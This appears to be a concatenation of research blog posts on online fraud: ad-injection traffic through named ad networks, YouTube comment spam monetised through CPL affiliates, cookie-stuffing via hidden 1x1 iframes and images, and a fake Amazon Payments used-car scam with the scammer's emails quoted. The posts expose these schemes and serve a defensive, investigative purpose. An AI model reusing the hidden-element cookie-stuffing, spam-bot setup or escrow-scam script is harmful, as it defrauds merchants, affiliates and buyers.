Facebook 124 Lotame, AppNexus, 122, AppNexus, Webcake Injector 81 Webcake Injector, Yahoo Right Media 79 AppNexus 76 Ilissos/Eyeblaster
Systweak 74 AppNexus, Yahoo Right Media,
Sprint 65 Aggregate Knowledge

Complete list of advertisers available here


Our data reveals a stark disconnect between advertising industry claims and actual practices. For one, numerous ad networks claim to have severed ties with injectors, a claim often inconsistent with our data. For example, on October 24, 2012 Ad Exchanger reported that Rubicon Project, PubMatic, and OpenX claimed to have ceased working with Sambreel and its subsidiaries. But our data — collected nearly a year later — reveals that these firms actually continue to broker substantial Sambreel inventory (along with impressions from other injectors). Indeed, we found OpenX a top-five intermediary brokering Sambreel Webcake injection placements as of September 2013. Similarly, App Nexus claims not to work with Sambreel and to claim that Sambreel’s injection tactic is unethical (“wrong”) — but in fact our crawler found that more than 80% of Sambreel Webcake impressions flow through App Nexus. Indeed, we found App Nexus the single largest broker of Sambreel Webcake traffic.

We also found injection traffic flowing to and through advertising intermediaries that affirmatively and prominently claim to have high quality standards. For example, Underdog Media tells advertisers that it places ads on “thousands of brand safe web sites” — never mentioning placements via ad injectors. Similarly, in the first sentence of its pitch to ad buyers, PubMatic promises “quality publishers” — describing “10,000+ sites” and “1,000+ quality publishers” but saying nothing of placements via ad injection. Nonetheless, our testing found widespread injection traffic flowing through these intermediaries.

By all indications, ad injectors use multiple names and convoluted relationships to hinder accountability. For example, at one point Sambreel’s “Businesses” page listed seventeen different brand names — some widely known by advertising professionals as performing ad injection; others relatively obscure. Sambreel subsequently removed this page and imposed a Robots.txt file blocking archival by although allowing all other crawlers. Advertising intermediaries seeking to avoid all Sambreel injections must find all of Sambreel’s product names (perhaps relying in part on others’ efforts, like a recent “unmasked” listing from ThreatTrack Security), then exclude every Sambreel product. Furthermore, they must also insist that their partners and their partners’ partners all do the same, less injection traffic arrive indirectly. As a result, even diligent networks and advertisers struggle to avoid receiving injection inventory.

Advertising optimization systems further assist injectors. Injected ads are placed in top positions in popular sites, so measurement systems tend to report that these ads perform well — for example, high click-through rate and frequent conversions (i.e. purchases). Meanwhile, injectors need not create or organize articles or other content, reducing their costs and letting them sell injection inventory at modest prices. A standard advertising optimization platform would tend to view injection traffic favorably — good performance at competitive costs. As a result, an optimization platform would ordinarily elect to buy more injection traffic — even if an advertiser in fact views this traffic as unethical or otherwise unwanted. A network would need strong internal controls and manual checks to counter the optimization platform’s recommendation.

Our view of injectors is guided by the need to protect investment incentives so publishers have appropriate motivation to build, update, and improve their sites. Most publishers incur significant costs in gathering and distributing content. Similarly, online merchants make significant investments to design their sites and attract users. If injectors and other adware can grab this traffic for their own purposes, without authorization and without payment, then originating publishers and merchants see lower upside to their investments — less revenue to offset the production of quality content, and less impetus to pay to bring users to their sites.

Meanwhile, injectors clearly worsen the user experience by displaying more ads, slowing page-loads, and sharing information about users’ browsing patterns. For example, we found Peachfuzz inserting two large ads (a 728×90 and a 300×250) into the top of — pushing Amazon’s core home page offers down the page. Last year we found a similar problem at Travelocity, where large top-of-page ads forced users to scroll to conduct a basic flight or hotel search. Amazon and Travelocity would never choose this design, as it invites users to take their business elsewhere. But injectors need not consider sites’ usability or reputation.

With reference to the example screenshots above, injectors also show ads that publishers would never accept. If the Dell site were to show ads for other companies — which it does not and to our knowledge never has — we are confident that Dell would not allow ads from direct competitors. But injectors have no such constraint, and we found the Coupon Companion injector targeting Dell with a Best Buy ad. Meanwhile, Peachfuzz inserte a fake-user-interface “You need to update your media player” ad into Amazon and inserted “Lose the belly fat” and “Who’s been arrested” ads into CNN. By separating publishers from ad quality decisions, injectors undermine the market forces that ordinarily encourage publishers to require high ad quality.

Notably, some companies both profit from injectors and are targeted by injections. For example, Google Youtube is a top target of most injectors, including as shown in multiple screenshots above. We understand that Google has asked some injectors to stop targeting Youtube in this way, and in a statement to AdWeek, Google claims to have “banned [injectors] from using Google’s monetization and marketing tools.” Despite Google’s claim, our crawlers reveal injector impressions often passing through Google, including Google’s in-house display ad marketplaces, DoubleClick serving, and more recent acquisitions such as AdMeld.

Our data reveals that some advertising platforms have succeeded in avoid injection inventory. Yet others have embraced injection traffic despite its serious problems. Remarkably, many advertising professionals seem to have at best a limited sense of which networks, exchanges, and other intermediaries are harboring injection traffic and allowing these practices to continue. Our reporting of top participants is a first step towards transparency in that regard.

YouTube Spam

By Wesley Brandi in CPL | Spam - (1 Comment)

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); We consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T into N”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

youtube spam sample setThere are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:youtube spam

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:


This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page:\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse in a browser:

  • is Google’s URL Shortener.
  •\nb1Bak redirects to which redirects to
  • This then redirects to

“So is the spammer?”

No, is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), he is paid a finder’s fee when YouTube users sign up with

Now this may or may not violate surveyjunkie’s acceptable terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to via two affiliates (klenzxcp and gqrzv5sx):

youtube spam leads to surveyjunkieModus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

  • A set of accounts (B) to thumbs up the comments posted by set A. This is how the spammers get to the top of the comment’s section. For each comment posted by A, a group of approvers from B will come along and give it a thumbs up which will quickly push it to the top. Naturally the size of B must be greater than the size of A. You can buy 100 regular (non PVA) YouTube accounts for $5

buy youtube  accounts

  • The tricky part is writing a tool that will monitor the front page of YouTube and post comments (with approval from set B) on each of the videos that have not yet been targeted. Not too difficult if you have Compsci 101 behind you (or even just a few weeks fiddling with Python/Java/.Net…). You won’t have to write it yourself though, because there are plenty of bots that already do this for you (with captcha support!). Expect to spend anywhere from $50 to $150.

The costs above are not where it ends. If you refresh a video with tainted comments for a while, you will notice that the tainted comment does eventually disappear (feedback from the community marks it as bad). Of course, sit a little while longer and the tainted comment will return. So as much as the YouTube abuse team is fighting the spammers back, the spammers are constantly increasing the size of set A and B.

“It’s all out war out there! What’s an abuse team to do?”

This is not a trivial problem to solve. What surprised me the most from analyzing YouTube spam comments, is that the same comment after being taken down will quickly make its way back to the top. I’d make a bet that there’s low hanging fruit to be had here by combining user feedback on tainted comments with a unique hash on the comment itself. In doing so one could block the comment at the front door.

“Yeah right, the spammers will then simply diversify each comment enough to avoid whatever filter is put in place”

Sure. The trick here is then to get to the root of the problem and really put a dent in their armour: identify outbound CPL links.

If you are a Linkshare affiliate competing for the same traffic as today’s rogue affiliate, know that you do not stand a chance. The reason for this is because Linkshare affiliate ‘smaqEgQUEvQ’ is unfairly using Cookie-Stuffing techniques to maximize his affiliate revenue.

Let’s look at how the scam is put together.

When visiting this page on, casual inspection yields nothing out of the ordinary.

affiliate fraud

Open up the HTML source behind this page and scroll to line 279, note the hidden iframe (with a 1×1 height/width and CSS display set to none) pointing to a Linkshare affiliate click link:

 WIDTH=1 HEIGHT=1 FRAMEBORDER=1  style="display:none">

This is HTML that will invisibly load the affiliate click link and in turn the merchant that it  routes through to (resulting in applicable cookies pushed onto the user’s machine), in this case it is . I dynamically modified the page to show the page that was hidden, follow the red arrow below



As is unfortunately the case with Cookie-Stuffing, the merchant will pay an unearned commission to the rogue affiliate should the user make a purchase within a predefined amount of time. So the merchant will lose and honest affiliates lose as well (for their cookies may have been overwritten).

Can’t reproduce this for yourself? This packet trace confirms the behavior in question.

I give this fraudster a 1/10.

  • 1 point for basic Cookie-Stuffing


Upon casual inspection, reviews antivirus solutions for your PC. In their own words:

We recommend you the best antivirus software for your PC. Our reviews and recommendations are balanced from the performance, budget and easy to use. Below are the Top 3 Antivirus programs that will give you the best performance and are Worth The Value You Pay For!

affiliate fraud

There’s a little more to this site than meets the eye. When you visit each of the pages for the products reviewed, is invisibly forcing affiliate cookies associated with the product in question onto your machine. The idea is that if you end up buying one of these products further down the road, then Bestpcantivirus will be paid a commission for they claim themselves as the entity responsible for the purchase. This is fine if you clicked through on the appropriate affiliate click links, but that’s not what happens here, i.e., Bestpcantivirus is playing the game unfairly. If you are an affiliate competing for the same traffic then you are going to lose.

Line 43 in the HTML source of this bestpcantivirus page has an IMG tag with a src attribute set to a link which will redirect through to an affiliate click link (CJ affiliate id 5727502) and then onto Norton.


Bestpcantivirus knows what they are doing is wrong, so they set the width and height attributes of this malformed image to 1×1, this way you won’t see it if you are just browsing casually. affiliate fraudI dynamically modified the DOM to alter the dimensions of this image to 50×50, the red arrow highlights what is really going on:

affiliate fraud

As always, if you can’t reproduce this for yourself, this packet trace confirms the activity.

I give this scammer a 2/10:

  • 1 point for the most basic form of Cookie-Stuffing
  • 1 point for Cookie-Stuffing multiple merchants:
    Merchant CJ Affiliate Id
    AVG 5727502
    Eset 3840211
    F-Secure 3840211
    Kaspersky 5727502
    Pandasecurity 5727502
    Zonealarm 3840211

Recall that the Bargain Hunter scam is a four pronged attack:

1. Scammer Sets the Trap

This ad has a 2002 Toyota Tacoma PreRunner up for grabs at $5,582. scam through amazon payments

It’s a pretty good deal, designed to whet my appetite and have me get in touch with the seller thinking that there’s a great deal here, i.e., it’s an entry point to a Bargain Hunter scam.

2. Victim Takes the Bait

First response from the seller:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I still have my  2002 Toyota Tacoma Double Cab SR-5 TRD Pre-runner 
with 3.4 V-6, automatic transmission.Used 128k miles ,VIN# 
5tegn92n72z012744 .

I will take only $5500 total price shipping included from Medford OR,
i have my own trailer to have the truck delivered to you.It has a 
clear title ready to be signed and notarized on your name.

Runs great,no problems at all,garage kept only.  I can offer a 7 days 

More pics attached here:

The Photobucket link shows pictures of the car that are not available in the original ad (so this must be legit, right?)

3. Scammer Gains Victim’s Trust

It stands to reason that nobody in their right mind would engage in a financial transaction involving a large sum of money, someone they have never met and a car they have never seen. More so when the first act of good faith must come from the buyer, i.e., send the money first and then you will receive the goods.

Ah, but what about an entity that I trust? I do transactions of this nature every day with Amazon right? So of course I will send money to them and then wait for delivery, if not for any other reason than they always deliver no matter what. Doesn’t take much to see how scammers will exploit this.

Email correspondence eventually received from the scammer when asking about how the transaction will take place:

From: Jessica Hale (
Subject: used car lead for Juanna - 2002 Toyota Tacoma‏

I have a contract with Amazon Payments so we can go through 
their Protection Program.

According with  the Amazon you have 7 days after you receive 
the car to inspect it and decide if you want to BUY IT or NOT.

Here is how it will work:

 1.First of all I will need  the following details from you:
 - Full Name
 - Full Address

 2. After I will receive the details from you, I will forward 
 them to Amazon.

 3. After they will process your info, they will send us both 
 invoices. You will receive the invoice with the details on 
 how to make a refundable payment to Amazon.They will hold 
 your payment while you test and inspect the vehicle at your
 home for a week.

 4. Amazon will contact me to ship the car to you. After you 
 receive the car you will have 7 days to test, verify and do 
 whatever you need to the car.  If you will decide to buy the 
 car, then I will get  the money from Amazon.

 5. If you will decide that you do not buy the car,  Amazon 
 will refund your payment same day.

I look forward to hearing from you . 

Thank you

Upon accepting these terms, I quickly got an email from someone claiming to be Amazon and amazon payment fraudThe Amazon email actually comes from a Live account: Amazon FPS (

4. Victim Sends Money

Once I send the money through Money Gram then it’s gone. I won’t hear from the seller again and the car will never arrive. I could get in touch with Amazon but they won’t know what I’m talking about (obviously because they were never involved)

I give this scammer 1/10:

- 1 point for a very basic Bargain Hunter scam

As is usually the case, the scammer could have done a lot more here to improve the scam. He didn’t screen calls, he didn’t sample responses and he did not go the extra mile when I asked for additional photos of the rear view mirror (saying that his kids broke his camera). Like most of the drivel out there, he is a bottom of the barrel scammer.

So sad to think that sooner or later the scammer behind this ad is going to catch another victim, he wouldn’t be doing this otherwise.